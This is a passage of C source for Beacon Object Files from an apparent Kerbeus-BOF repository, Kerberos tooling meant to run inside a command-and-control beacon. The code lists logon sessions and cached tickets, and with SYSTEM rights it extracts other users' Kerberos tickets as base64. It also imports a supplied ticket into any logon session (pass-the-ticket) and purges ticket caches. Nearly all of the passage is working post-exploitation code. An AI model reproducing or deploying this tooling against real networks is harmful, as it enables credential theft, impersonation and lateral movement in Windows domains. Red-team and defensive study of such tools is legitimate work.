    size_t output_len = 4 * ((input_len + 2) / 3);
    byte* output = MemAlloc(output_len + 1);
    if (output == NULL)
        return NULL;

    size_t i = 0, j = 0;
    while (i < input_len) {
        UINT octet_a = i < input_len ? input[i++] : 0;
        UINT octet_b = i < input_len ? input[i++] : 0;
        UINT octet_c = i < input_len ? input[i++] : 0;

        UINT triple = (octet_a << 0x10) + (octet_b << 0x08) + octet_c;

        output[j++] = base64_chars[(triple >> 3 * 6) & 0x3F];
        output[j++] = base64_chars[(triple >> 2 * 6) & 0x3F];
        output[j++] = base64_chars[(triple >> 1 * 6) & 0x3F];
        output[j++] = base64_chars[(triple >> 0 * 6) & 0x3F];
    }

    if (input_len % 3 == 1) {
        output[output_len - 1] = '=';
        output[output_len - 2] = '=';
    }
    else if (input_len % 3 == 2) {
        output[output_len - 1] = '=';
    }

    output[output_len] = '\0';
    return output;
}

bool ExtractTicket(HANDLE hLsa, ULONG authPackage, LUID luid, UNICODE_STRING targetName, byte** ticket, int* ticketSize) {
    KERB_RETRIEVE_TKT_RESPONSE* retrieveResponse = NULL;
    ULONG responseSize = sizeof(KERB_RETRIEVE_TKT_REQUEST) + targetName.MaximumLength;
    KERB_RETRIEVE_TKT_REQUEST* retrieveRequest = MemAlloc(responseSize);

    retrieveRequest->MessageType = KerbRetrieveEncodedTicketMessage;
    retrieveRequest->LogonId = luid;
    retrieveRequest->TicketFlags = 0;
    retrieveRequest->CacheOptions = KERB_RETRIEVE_TICKET_AS_KERB_CRED;
    retrieveRequest->EncryptionType = 0;
    retrieveRequest->TargetName = targetName;
    retrieveRequest->TargetName.Buffer = (PWSTR)((PBYTE)retrieveRequest + sizeof(KERB_RETRIEVE_TKT_REQUEST));
    MemCpy(retrieveRequest->TargetName.Buffer, targetName.Buffer, targetName.MaximumLength);

    NTSTATUS protocolStatus;
    bool status = SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, retrieveRequest, responseSize, &retrieveResponse, &responseSize, &protocolStatus);
    if (!status && !protocolStatus) {
        if (responseSize > 0) {
            ULONG size = retrieveResponse->Ticket.EncodedTicketSize;
            *ticket = (PUCHAR)MemAlloc(size);
            MemCpy(*ticket, retrieveResponse->Ticket.EncodedTicket, size);
            *ticketSize = size;
            return true;
        }
    }
    return false;
}
#endif

void PrintTicketInfo(KERB_TICKET_CACHE_INFO_EX cacheInfo, LUID luid) {
    SYSTEMTIME EndTime = ConvertToSystemtime(cacheInfo.EndTime);

    int length = cacheInfo.ClientName.Length / 2 + cacheInfo.ClientRealm.Length / 2 + 4;
    char* client = MemAlloc(length);
    KERNEL32$WideCharToMultiByte(CP_ACP, 0, cacheInfo.ClientName.Buffer, cacheInfo.ClientName.Length / 2, client, length, NULL, 0);
    MemCpy(client + cacheInfo.ClientName.Length / 2, " @ ", 3);
    KERNEL32$WideCharToMultiByte(CP_ACP, 0, cacheInfo.ClientRealm.Buffer, cacheInfo.ClientRealm.Length / 2, client + cacheInfo.ClientName.Length / 2 + 3, cacheInfo.ClientRealm.Length / 2 + 1, NULL, 0);
    char* servername = MemAlloc(cacheInfo.ServerName.Length / 2 + 1);
    KERNEL32$WideCharToMultiByte(CP_ACP, 0, cacheInfo.ServerName.Buffer, cacheInfo.ServerName.Length / 2, servername, cacheInfo.ServerName.Length / 2 + 1, NULL, 0);

#ifdef TRIAGE
    PRINT_OUT("| %lx:0x%-7lx | %-40s | %-40s | %02d.%02d.%04d %02d:%02d:%02d |\n", luid.HighPart, luid.LowPart, client, servername, EndTime.wDay, EndTime.wMonth, EndTime.wYear, EndTime.wHour, EndTime.wMinute, EndTime.wSecond);
#else
        char* serverrealm = MemAlloc(cacheInfo.ServerRealm.Length / 2 + 1);
        KERNEL32$WideCharToMultiByte(CP_ACP, 0, cacheInfo.ServerRealm.Buffer, cacheInfo.ServerRealm.Length / 2, serverrealm, cacheInfo.ServerRealm.Length / 2 + 1, NULL, 0);

        SYSTEMTIME StartTime = ConvertToSystemtime(cacheInfo.StartTime);
        SYSTEMTIME RenewTime = ConvertToSystemtime(cacheInfo.RenewTime);
        uint flags = cacheInfo.TicketFlags;

        PRINT_OUT("\tClientName               :  %s\n", client);
        PRINT_OUT("\tServiceRealm             :  %s @ %s\n", servername, serverrealm);

        PRINT_OUT("\tStartTime (UTC)          :  %02d.%02d.%04d %02d:%02d:%02d\n", StartTime.wDay, StartTime.wMonth, StartTime.wYear, StartTime.wHour, StartTime.wMinute, StartTime.wSecond);
        PRINT_OUT("\tEndTime (UTC)            :  %02d.%02d.%04d %02d:%02d:%02d\n", EndTime.wDay, EndTime.wMonth, EndTime.wYear, EndTime.wHour, EndTime.wMinute, EndTime.wSecond);
        PRINT_OUT("\tRenewTill (UTC)          :  %02d.%02d.%04d %02d:%02d:%02d\n", RenewTime.wDay, RenewTime.wMonth, RenewTime.wYear, RenewTime.wHour, RenewTime.wMinute, RenewTime.wSecond);

        PRINT_OUT("\tFlags                    :  ");
        if (flags & reserved)		PRINT_OUT("reserved ");
        if (flags & forwardable)	PRINT_OUT("forwardable ");
        if (flags & forwarded)		PRINT_OUT("forwarded ");
        if (flags & proxiable)		PRINT_OUT("proxiable ");
        if (flags & proxy)			PRINT_OUT("proxy ");
        if (flags & may_postdate)	PRINT_OUT("may_postdate ");
        if (flags & postdated)		PRINT_OUT("postdated ");
        if (flags & invalid)		PRINT_OUT("invalid ");
        if (flags & renewable)		PRINT_OUT("renewable ");
        if (flags & initial)		PRINT_OUT("initial ");
        if (flags & pre_authent)	PRINT_OUT("pre_authent ");
        if (flags & hw_authent)		PRINT_OUT("hw_authent ");
        if (flags & ok_as_delegate) PRINT_OUT("ok_as_delegate ");
        if (flags & anonymous)		PRINT_OUT("anonymous ");
        if (flags & enc_pa_rep)		PRINT_OUT("enc_pa_rep ");
        if (flags & reserved1)		PRINT_OUT("reserved1 ");
        PRINT_OUT("\n");

        if (cacheInfo.EncryptionType == rc4_hmac)
            PRINT_OUT("\tKeyType                  :  rc4_hmac\n");
        else if (cacheInfo.EncryptionType == aes128_cts_hmac_sha1)
            PRINT_OUT("\tKeyType                  :  aes128_cts_hmac_sha1\n");
        else if (cacheInfo.EncryptionType == aes256_cts_hmac_sha1)
            PRINT_OUT("\tKeyType                  :  aes256_cts_hmac_sha1\n");
        PRINT_OUT("\n");
#endif
}

#ifndef TRIAGE
void PrintLogonSessionData(SECURITY_LOGON_SESSION_DATA data) {
    char* sid = NULL;
    char* username = MemAlloc(data.UserName.Length / 2 + 1);
    KERNEL32$WideCharToMultiByte(CP_ACP, 0, data.UserName.Buffer, data.UserName.Length / 2, username, data.UserName.Length / 2 + 1, NULL, 0);
    char* domain = MemAlloc(data.LogonDomain.Length / 2 + 1);
    KERNEL32$WideCharToMultiByte(CP_ACP, 0, data.LogonDomain.Buffer, data.LogonDomain.Length / 2, domain, data.LogonDomain.Length / 2 + 1, NULL, 0);
    char* authpack = MemAlloc(data.AuthenticationPackage.Length / 2 + 1);
    KERNEL32$WideCharToMultiByte(CP_ACP, 0, data.AuthenticationPackage.Buffer, data.AuthenticationPackage.Length / 2, authpack, data.AuthenticationPackage.Length / 2 + 1, NULL, 0);
    char* server = MemAlloc(data.LogonServer.Length / 2 + 1);
    KERNEL32$WideCharToMultiByte(CP_ACP, 0, data.LogonServer.Buffer, data.LogonServer.Length / 2, server, data.LogonServer.Length / 2 + 1, NULL, 0);
    char* upn = MemAlloc(data.Upn.Length / 2 + 1);
    KERNEL32$WideCharToMultiByte(CP_ACP, 0, data.Upn.Buffer, data.Upn.Length, upn, data.Upn.Length, NULL, 0);

    PRINT_OUT("UserName                : %s\n", username);
    PRINT_OUT("Domain                  : %s\n", domain);
    PRINT_OUT("LogonId                 : %lx:0x%lx\n", data.LogonId.HighPart, data.LogonId.LowPart);
    PRINT_OUT("Session                 : %ld\n", data.Session);
    if (ADVAPI32$ConvertSidToStringSidA(data.Sid, &sid))
        PRINT_OUT("UserSID                 : %s\n", sid);
    else
        PRINT_OUT("UserSID                 : -\n");
    PRINT_OUT("Authentication package  : %s\n", authpack);
    PRINT_OUT("LogonServer             : %s\n", server);
    PRINT_OUT("UserPrincipalName       : %s\n", upn);
    PRINT_OUT("\n");
}
#endif

int my_isdigit(int c) {
    return (c >= '0' && c <= '9');
}

int my_islower(int c) {
    return (c >= 'a' && c <= 'z');
}

long int my_strtol(const char* str, char** endptr, int base) {
    long int result = 0;
    int sign = 1;

    if (*str == '-' || *str == '+') {
        sign = (*str == '-') ? -1 : 1;
        str++;
    }

    while (my_isdigit(*str) ||
           (base == 16 && (*str >= 'a' && *str <= 'f')) ||
           (base == 16 && (*str >= 'A' && *str <= 'F'))) {
        int digit = 0;
        if (my_isdigit(*str)) {
            digit = *str - '0';
        }
        else if (base == 16) {
            digit = (my_islower(*str) ? (*str - 'a' + 10) : (*str - 'A' + 10));
        }

        if (digit >= base)
            break;

        if (result > (LONG_MAX - digit) / base) {
            if (sign == 1)
                return LONG_MAX;
            else
                return LONG_MIN;
        }

        result = result * base + digit;
        str++;
    }

    if (endptr != NULL)
        *endptr = (char*)str;

    return result * sign;
}

void KLIST( char* luid, char* targetService, char* targetUser, char* targetClient ) {
    LUID   targetLuid = { 0 };
    HANDLE hToken = GetCurrentToken(TOKEN_QUERY);
    BOOL IsHighIntegrity = IsSystem(hToken);

    if (!IsHighIntegrity && (luid || targetUser)) {
        PRINT_OUT("[X] You need to be in SYSTEM integrity.\n");
        return;
    }

    if (luid) {
        targetLuid.LowPart = my_strtol(luid, NULL, 16);
        if (targetLuid.LowPart == 0 || targetLuid.LowPart == LONG_MAX || targetLuid.LowPart == LONG_MIN) {
            PRINT_OUT("[x] Invalid luid\n");
            return;
        }
        PRINT_OUT("\nAction: List Kerberos Tickets( LUID: %s)\n\n", luid);
    }
    else if (IsHighIntegrity) {
        if( targetUser )
            PRINT_OUT("\nAction: List Kerberos Tickets for '%s'\n\n", targetUser);
        else
            PRINT_OUT("\nAction: List Kerberos Tickets (All Users)\n\n");
    }
    else {
        targetLuid = GetCurrentLUID(hToken);
        PRINT_OUT("\nAction: List Kerberos Tickets (Current User)\n\n");
    }

    if (targetService)
        PRINT_OUT("[*] Target service  : %s\n", targetService);
    if (targetClient)
        PRINT_OUT("[*] Target client   : %s\n", targetClient);
    if (targetUser)
        PRINT_OUT("[*] Target user     : %s\n", targetUser);
    if (luid)
        PRINT_OUT("[*] Target LUID     : %s\n", luid);
    PRINT_OUT("\n");

#ifdef TRIAGE
        PRINT_OUT("--------------------------------------------------------------------------------------------------------------------------\n");
        PRINT_OUT("| %-11s | %-40s | %-40s | %19s |\n", "LUID", "Client", "Service", "End Time");
        PRINT_OUT("--------------------------------------------------------------------------------------------------------------------------\n");
#endif

    HANDLE hLsa;
    if (GetLsaHandle(hToken, IsHighIntegrity, &hLsa)) return;

    ULONG authPackage;
    LSA_STRING krbAuth = { .Buffer = "kerberos",.Length = 8,.MaximumLength = 9 };
    if (SECUR32$LsaLookupAuthenticationPackage(hLsa, &krbAuth, &authPackage) == 0) {

        LOGON_SESSION_DATA sessionData;
        if (GetLogonSessionData(targetLuid, &sessionData) == 0) {
            KERB_QUERY_TKT_CACHE_REQUEST cacheRequest;
            cacheRequest.MessageType = KerbQueryTicketCacheExMessage;

            for (int i = 0; i < sessionData.sessionCount; i++) {
                if (sessionData.sessionData[i] == NULL)
                    continue;

                if (targetUser) {
                    int usernameLength = (*sessionData.sessionData[i]).UserName.Length / 2;
                    char* username = MemAlloc(usernameLength + 1);
                    KERNEL32$WideCharToMultiByte(CP_ACP, 0, (*sessionData.sessionData[i]).UserName.Buffer, usernameLength, username, usernameLength + 1, NULL, 0);
                    StrToLower(username);
                    StrToLower(targetUser);
                    if (my_strncmp(targetUser, username, my_strlen(targetUser) + 1) != 0) {
                        continue;
                    }
                }

                if (IsHighIntegrity)
                    cacheRequest.LogonId = sessionData.sessionData[i]->LogonId;
                else
                    cacheRequest.LogonId = (LUID){ 0 };

#ifndef TRIAGE
                    PrintLogonSessionData((*sessionData.sessionData[i]));
#endif
                LUID user_luid = (*sessionData.sessionData[i]).LogonId;
                SECUR32$LsaFreeReturnBuffer(sessionData.sessionData[i]);
                KERB_QUERY_TKT_CACHE_EX_RESPONSE* cacheResponse = NULL;
                KERB_TICKET_CACHE_INFO_EX cacheInfo;
                ULONG responseSize;
                NTSTATUS protocolStatus;
                if (SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, &cacheRequest, sizeof(cacheRequest), &cacheResponse, &responseSize, &protocolStatus)) continue;
                if (cacheResponse == NULL)
                    continue;

                int ticketCount = cacheResponse->CountOfTickets;
#ifndef TRIAGE
                    PRINT_OUT("[*] Cached tickets: (%d)\n\n", ticketCount);
#endif
                if (ticketCount > 0) {
                    int tkt_index = 0;
                    for (int j = 0; j < ticketCount; j++) {
                        bool includeTicket = true;
                        cacheInfo = cacheResponse->Tickets[j];

                        if (targetService) {
                            int serviceLength = cacheInfo.ServerName.Length / 2;
                            char* service = MemAlloc(serviceLength + 1);
                            KERNEL32$WideCharToMultiByte(CP_ACP, 0, cacheInfo.ServerName.Buffer, serviceLength, service, serviceLength + 1, NULL, 0);
                            StrToLower(service);
                            StrToLower(targetService);
                            if (my_strncmp(targetService, service, my_strlen(targetService)) != 0)
                                includeTicket = false;
                        }

                        if (targetClient) {
                            int clientLength = cacheInfo.ClientName.Length / 2;
                            char* client = MemAlloc(clientLength + 1);
                            KERNEL32$WideCharToMultiByte(CP_ACP, 0, cacheInfo.ClientName.Buffer, clientLength, client, clientLength + 1, NULL, 0);
                            StrToLower(client);
                            StrToLower(targetClient);
                            if (my_strncmp(targetClient, client, my_strlen(targetClient) + 1) != 0)
                                includeTicket = false;
                        }

                        if (includeTicket) {
#ifndef TRIAGE
                                PRINT_OUT("  [%d]\n", tkt_index++);
#endif
                            PrintTicketInfo(cacheInfo, user_luid);

#ifdef DUMP
                                byte* ticket = NULL;
                                int ticketSize = 0;
                                if (ExtractTicket(hLsa, authPackage, cacheRequest.LogonId, cacheInfo.ServerName, &ticket, &ticketSize)) {
                                    char* base_ticket = base64_encode(ticket, ticketSize);
                                    PRINT_OUT("\t%s\n\n", base_ticket);
                                }
#endif
                        }
                    }
                }
                SECUR32$LsaFreeReturnBuffer(cacheResponse);
            }
        }
    }
#ifdef TRIAGE
        PRINT_OUT("--------------------------------------------------------------------------------------------------------------------------\n");
#endif
    SECUR32$LsaDeregisterLogonProcess(hLsa);
}

void KLIST_RUN( PCHAR Buffer, IN DWORD Length ) {
    char* luid = NULL;
    char* targetUser = NULL;
    char* targetService = NULL;
    char* targetClient = NULL;

    for (int i = 0; i < Length; i++) {
        i += GetStrParam(Buffer + i, Length - i, "/luid:", 6, &luid );
        i += GetStrParam(Buffer + i, Length - i, "/user:", 6, &targetUser );
        i += GetStrParam(Buffer + i, Length - i, "/service:", 9, &targetService );
        i += GetStrParam(Buffer + i, Length - i, "/client:", 8, &targetClient );
    }
#ifdef TRIAGE
    KLIST(luid, targetService, targetUser, targetClient);
#else
    KLIST(luid, targetService, targetUser, targetClient);
#endif
}

VOID go( IN PCHAR Buffer, IN ULONG Length ) {
    INIT_BOF();

    datap parser;
    BeaconDataParse(&parser, Buffer, Length);
    DWORD PARAM_SIZE = 0;
    PBYTE PARAM = BeaconDataExtract(&parser, &PARAM_SIZE);

    if( LoadFunc() )
        PRINT_OUT("%s\n", "Modules not loaded");
    else
        KLIST_RUN( PARAM, PARAM_SIZE );

    FreeBank();

    END_BOF();
}

================================================
FILE: AD-BOF/Kerbeus-BOF/ptt/ptt.c
================================================
#include "_include/functions.c"

int base64_decode_char(char c) {
    if (c >= 'A' && c <= 'Z')
        return c - 'A';
    if (c >= 'a' && c <= 'z')
        return c - 'a' + 26;
    if (c >= '0' && c <= '9')
        return c - '0' + 52;
    if (c == '+')
        return 62;
    if (c == '/')
        return 63;
    return -1; // Invalid character
}

byte* base64_decode(byte* input, int* output_len) {
    int input_len = my_strlen(input);
    int padding = 0;
    if (input_len == 0) {
        *output_len = 0;
        return NULL;
    }

    if (input[input_len - 1] == '=') {
        padding++;
        if (input[input_len - 2] == '=') {
            padding++;
        }
    }

    *output_len = (input_len * 3) / 4 - padding;
    byte* output = MemAlloc(*output_len);
    if (output == NULL)
        return NULL;

    size_t i = 0, j = 0;
    while (i < input_len - padding) {
        UINT sextet_a = input[i] == '=' ? 0 : (UINT)base64_decode_char(input[i++]);
        UINT sextet_b = input[i] == '=' ? 0 : (UINT)base64_decode_char(input[i++]);
        UINT sextet_c = input[i] == '=' ? 0 : (UINT)base64_decode_char(input[i++]);
        UINT sextet_d = input[i] == '=' ? 0 : (UINT)base64_decode_char(input[i++]);

        UINT triple = (sextet_a << 18) + (sextet_b << 12) + (sextet_c << 6) + sextet_d;

        if (j < *output_len)
            output[j++] = (triple >> 16) & 0xFF;
        if (j < *output_len)
            output[j++] = (triple >> 8) & 0xFF;
        if (j < *output_len)
            output[j++] = triple & 0xFF;
    }
    return output;
}

HANDLE GetCurrentToken(DWORD DesiredAccess) {
    HANDLE hCurrentToken = NULL;
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), DesiredAccess, FALSE, &hCurrentToken))
        if (hCurrentToken == NULL && KERNEL32$GetLastError() == ERROR_NO_TOKEN)
            if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), DesiredAccess, &hCurrentToken))
                return NULL;
    return hCurrentToken;
}

LUID GetCurrentLUID(HANDLE TokenHandle) {
    TOKEN_STATISTICS tokenStats;
    DWORD tokenSize;
    if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenStatistics, &tokenStats, sizeof(tokenStats), &tokenSize))
        return (LUID) { 0 };
    return tokenStats.AuthenticationId;
}

BOOL IsSystem(HANDLE TokenHandle) {
    UCHAR bTokenUser[sizeof(TOKEN_USER) + 8 + 4 * SID_MAX_SUB_AUTHORITIES];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)bTokenUser;
    ULONG cbTokenUser;
    SID_IDENTIFIER_AUTHORITY siaNT = SECURITY_NT_AUTHORITY;
    PSID pSystemSid = NULL;
    BOOL bSystem = FALSE;

    // Try to open the token of the current thread first
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), TOKEN_QUERY, TRUE, &TokenHandle)) {
        // If there is no thread token, fall back to the process token
        if (KERNEL32$GetLastError() == ERROR_NO_TOKEN) {
            if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_QUERY, &TokenHandle)) {
                return FALSE;
            }
        } else {
            return FALSE;
        }
    }

    if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenUser, pTokenUser, sizeof(bTokenUser), &cbTokenUser)) {
        return FALSE;
    }

    if (!ADVAPI32$AllocateAndInitializeSid(&siaNT, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &pSystemSid)) {
        return FALSE;
    }

    bSystem = ADVAPI32$EqualSid(pTokenUser->User.Sid, pSystemSid);

    ADVAPI32$FreeSid(pSystemSid);

    return bSystem;
}

BOOL GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) {
    HANDLE hLsaLocal = NULL;
    ULONG  mode = 0;
    bool   status = true;
    if (highIntegrity) {
        STRING lsaString = (STRING){ .Length = 8, .MaximumLength = 9, .Buffer = "Winlogon" };
        status = SECUR32$LsaRegisterLogonProcess(&lsaString, &hLsaLocal, &mode);
    }
    else {
        status = SECUR32$LsaConnectUntrusted(&hLsaLocal);
    }
    *hLsa = hLsaLocal;
    return status;
}

int my_isdigit(int c) {
    return (c >= '0' && c <= '9');
}

int my_islower(int c) {
    return (c >= 'a' && c <= 'z');
}

long int my_strtol(const char* str, char** endptr, int base) {
    long int result = 0;
    int sign = 1;

    if (*str == '-' || *str == '+') {
        sign = (*str == '-') ? -1 : 1;
        str++;
    }

    while (my_isdigit(*str) ||
           (base == 16 && (*str >= 'a' && *str <= 'f')) ||
           (base == 16 && (*str >= 'A' && *str <= 'F'))) {
        int digit = 0;
        if (my_isdigit(*str)) {
            digit = *str - '0';
        }
        else if (base == 16) {
            digit = (my_islower(*str) ? (*str - 'a' + 10) : (*str - 'A' + 10));
        }

        if (digit >= base)
            break;

        if (result > (LONG_MAX - digit) / base) {
            if (sign == 1)
                return LONG_MAX;
            else
                return LONG_MIN;
        }

        result = result * base + digit;
        str++;
    }

    if (endptr != NULL)
        *endptr = (char*)str;

    return result * sign;
}

void PTT(char* luid, byte* ticket) {
    HANDLE hToken = GetCurrentToken(TOKEN_QUERY);
    LUID   currentLuid = GetCurrentLUID(hToken);
    LUID   targetLuid = { 0 };
    bool   IsHighIntegrity = IsSystem(hToken);

    if (luid) {
        targetLuid.LowPart = my_strtol(luid, NULL, 16);
        if (targetLuid.LowPart == 0 || targetLuid.LowPart == LONG_MAX || targetLuid.LowPart == LONG_MIN) {
            PRINT_OUT("[x] Invalid luid\n");
            return;
        }
    }
    else {
        targetLuid = currentLuid;
    }

    if (!IsHighIntegrity && currentLuid.LowPart != targetLuid.LowPart) {
        PRINT_OUT("[X] You need to be in SYSTEM integrity.\n");
        return;
    }

    if (currentLuid.LowPart != targetLuid.LowPart)
        IsHighIntegrity = false;

    HANDLE hLsa;
    if (GetLsaHandle(hToken, IsHighIntegrity, &hLsa)) return;

    ULONG authPackage;
    LSA_STRING krbAuth = { .Buffer = "kerberos",.Length = 8,.MaximumLength = 9 };
    if (SECUR32$LsaLookupAuthenticationPackage(hLsa, &krbAuth, &authPackage) == 0) {

        int decode_ticket_size = 0;
        byte* decode_ticket = base64_decode(ticket, &decode_ticket_size);

        int submitSize = sizeof(KERB_SUBMIT_TKT_REQUEST) + decode_ticket_size;
        KERB_SUBMIT_TKT_REQUEST* submitRequest = MemAlloc(submitSize);

        submitRequest->MessageType = KerbSubmitTicketMessage;
        submitRequest->KerbCredSize = decode_ticket_size;
        submitRequest->KerbCredOffset = sizeof(KERB_SUBMIT_TKT_REQUEST);
        if (IsHighIntegrity)
            submitRequest->LogonId = targetLuid;
        else
            submitRequest->LogonId = (LUID){ 0 };

        MemCpy((PBYTE)submitRequest + submitRequest->KerbCredOffset, decode_ticket, decode_ticket_size);

        NTSTATUS protocolStatus = 0;
        ULONG    responseSize = 0;
        void* response = 0;
        if (SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, submitRequest, submitSize, &response, &responseSize, &protocolStatus) || protocolStatus)
            PRINT_OUT("\n[X] Ticket not imported.\n");
        else
            PRINT_OUT("\n[+] Ticket successfully imported.\n");
    }
    SECUR32$LsaDeregisterLogonProcess(hLsa);
}

void PTT_RUN( PCHAR Buffer, IN DWORD Length ) {
    PRINT_OUT("\n[*] Action: Import Ticket\n\n");

    char* ticket = NULL;
    char* luid = NULL;

    for (int i = 0; i < Length; i++) {
        i += GetStrParam(Buffer + i, Length - i, "/luid:", 6, &luid );
        i += GetStrParam(Buffer + i, Length - i, "/ticket:", 8, &ticket );
    }

    if (ticket)
        PTT(luid, ticket);
    else
        PRINT_OUT("[X] /ticket:BASE64 must be supplied!\n");
}

VOID go( IN PCHAR Buffer, IN ULONG Length ) {
    INIT_BOF();

    datap parser;
    BeaconDataParse(&parser, Buffer, Length);
    DWORD PARAM_SIZE = 0;
    PBYTE PARAM = BeaconDataExtract(&parser, &PARAM_SIZE);

    if( LoadFunc() )
        PRINT_OUT("%s\n", "Modules not loaded");
    else
        PTT_RUN( PARAM, PARAM_SIZE );

    FreeBank();

    END_BOF();
}

================================================
FILE: AD-BOF/Kerbeus-BOF/purge/purge.c
================================================
#include "_include/functions.c"

HANDLE GetCurrentToken(DWORD DesiredAccess) {
    HANDLE hCurrentToken = NULL;
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), DesiredAccess, FALSE, &hCurrentToken))
        if (hCurrentToken == NULL && KERNEL32$GetLastError() == ERROR_NO_TOKEN)
            if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), DesiredAccess, &hCurrentToken))
                return NULL;
    return hCurrentToken;
}

LUID GetCurrentLUID(HANDLE TokenHandle) {
    TOKEN_STATISTICS tokenStats;
    DWORD tokenSize;
    if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenStatistics, &tokenStats, sizeof(tokenStats), &tokenSize))
        return (LUID) { 0 };
    return tokenStats.AuthenticationId;
}

BOOL IsSystem(HANDLE TokenHandle) {
    UCHAR bTokenUser[sizeof(TOKEN_USER) + 8 + 4 * SID_MAX_SUB_AUTHORITIES];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)bTokenUser;
    ULONG cbTokenUser;
    SID_IDENTIFIER_AUTHORITY siaNT = SECURITY_NT_AUTHORITY;
    PSID pSystemSid = NULL;
    BOOL bSystem = FALSE;

    // Try to open the token of the current thread first
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), TOKEN_QUERY, TRUE, &TokenHandle)) {
        // If there is no thread token, fall back to the process token
        if (KERNEL32$GetLastError() == ERROR_NO_TOKEN) {
            if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_QUERY, &TokenHandle)) {
                return FALSE;
            }
        } else {
            return FALSE;
        }
    }

    if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenUser, pTokenUser, sizeof(bTokenUser), &cbTokenUser)) {
        return FALSE;
    }

    if (!ADVAPI32$AllocateAndInitializeSid(&siaNT, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &pSystemSid)) {
        return FALSE;
    }

    bSystem = ADVAPI32$EqualSid(pTokenUser->User.Sid, pSystemSid);

    ADVAPI32$FreeSid(pSystemSid);

    return bSystem;
}

BOOL GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) {
    HANDLE hLsaLocal = NULL;
    ULONG  mode = 0;
    bool   status = true;
    if (highIntegrity) {
        STRING lsaString = (STRING){ .Length = 8, .MaximumLength = 9, .Buffer = "Winlogon" };
        status = SECUR32$LsaRegisterLogonProcess(&lsaString, &hLsaLocal, &mode);
    }
    else {
        status = SECUR32$LsaConnectUntrusted(&hLsaLocal);
    }
    *hLsa = hLsaLocal;
    return status;
}

int my_isdigit(int c) {
    return (c >= '0' && c <= '9');
}

int my_islower(int c) {
    return (c >= 'a' && c <= 'z');
}

long int my_strtol(const char* str, char** endptr, int base) {
    long int result = 0;
    int sign = 1;

    if (*str == '-' || *str == '+') {
        sign = (*str == '-') ? -1 : 1;
        str++;
    }

    while (my_isdigit(*str) ||
           (base == 16 && (*str >= 'a' && *str <= 'f')) ||
           (base == 16 && (*str >= 'A' && *str <= 'F'))) {
        int digit = 0;
        if (my_isdigit(*str)) {
            digit = *str - '0';
        }
        else if (base == 16) {
            digit = (my_islower(*str) ? (*str - 'a' + 10) : (*str - 'A' + 10));
        }

        if (digit >= base)
            break;

        if (result > (LONG_MAX - digit) / base) {
            if (sign == 1)
                return LONG_MAX;
            else
                return LONG_MIN;
        }

        result = result * base + digit;
        str++;
    }

    if (endptr != NULL)
        *endptr = (char*)str;

    return result * sign;
}

void PURGE(char* luid) {
    HANDLE hToken = GetCurrentToken(TOKEN_QUERY);
    LUID   currentLuid = GetCurrentLUID(hToken);
    LUID   targetLuid = { 0 };

    bool   IsHighIntegrity = IsSystem(hToken);

    if (luid) {
        targetLuid.LowPart = my_strtol(luid, NULL, 16);
        if (targetLuid.LowPart == 0 || targetLuid.LowPart == LONG_MAX || targetLuid.LowPart == LONG_MIN) {
            PRINT_OUT("[x] Invalid luid\n");
            return;
        }
    }
    else {
        targetLuid = currentLuid;
    }

    if (!IsHighIntegrity && currentLuid.LowPart != targetLuid.LowPart) {
        PRINT_OUT("[X] You need to be in SYSTEM integrity.\n");
        return;
    }

    HANDLE hLsa;
    if (GetLsaHandle(hToken, IsHighIntegrity, &hLsa)) return;

    ULONG authPackage;
    LSA_STRING krbAuth = { .Buffer = "kerberos",.Length = 8,.MaximumLength = 9 };
    if (SECUR32$LsaLookupAuthenticationPackage(hLsa, &krbAuth, &authPackage) == 0) {

        KERB_PURGE_TKT_CACHE_REQUEST purgeRequest;
        purgeRequest.MessageType = KerbPurgeTicketCacheMessage;
        purgeRequest.RealmName = (UNICODE_STRING){ .Buffer = L"", .Length = 0, .MaximumLength = 1 };
        purgeRequest.ServerName = (UNICODE_STRING){ .Buffer = L"", .Length = 0, .MaximumLength = 1 };

        if (IsHighIntegrity)
            purgeRequest.LogonId = targetLuid;
        else
            purgeRequest.LogonId = (LUID){ 0 };

        void* purgeResponse = NULL;
        ULONG responseSize = 0;
        NTSTATUS protocolStatus = 0;
        if (SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, &purgeRequest, sizeof(KERB_PURGE_TKT_CACHE_REQUEST), &purgeResponse, &responseSize, &protocolStatus) || protocolStatus)
            PRINT_OUT("[X] Tickets not purged.\n");
        else
            PRINT_OUT("[+] Successfully purged tickets.\n");
    }
    SECUR32$LsaDeregisterLogonProcess(hLsa);
}

void PURGE_RUN( PCHAR Buffer, IN DWORD Length ) {
    PRINT_OUT("\n[*] Action: Purge Tickets\n\n");

    char* luid = NULL;

    for (int i = 0; i < Length; i++)
        i += GetStrParam(Buffer + i, Length - i, "/luid:", 6, &luid );

    PURGE(luid);
}

VOID go( IN PCHAR Buffer, IN ULONG Length ) {
    INIT_BOF();

    datap parser;
    BeaconDataParse(&parser, Buffer, Length);
    DWORD PARAM_SIZE = 0;
    PBYTE PARAM = BeaconDataExtract(&parser, &PARAM_SIZE);

    if( LoadFunc() )
        PRINT_OUT("%s\n", "Modules not loaded");
    else
        PURGE_RUN( PARAM, PARAM_SIZE );

    FreeBank();

    END_BOF();
}

================================================
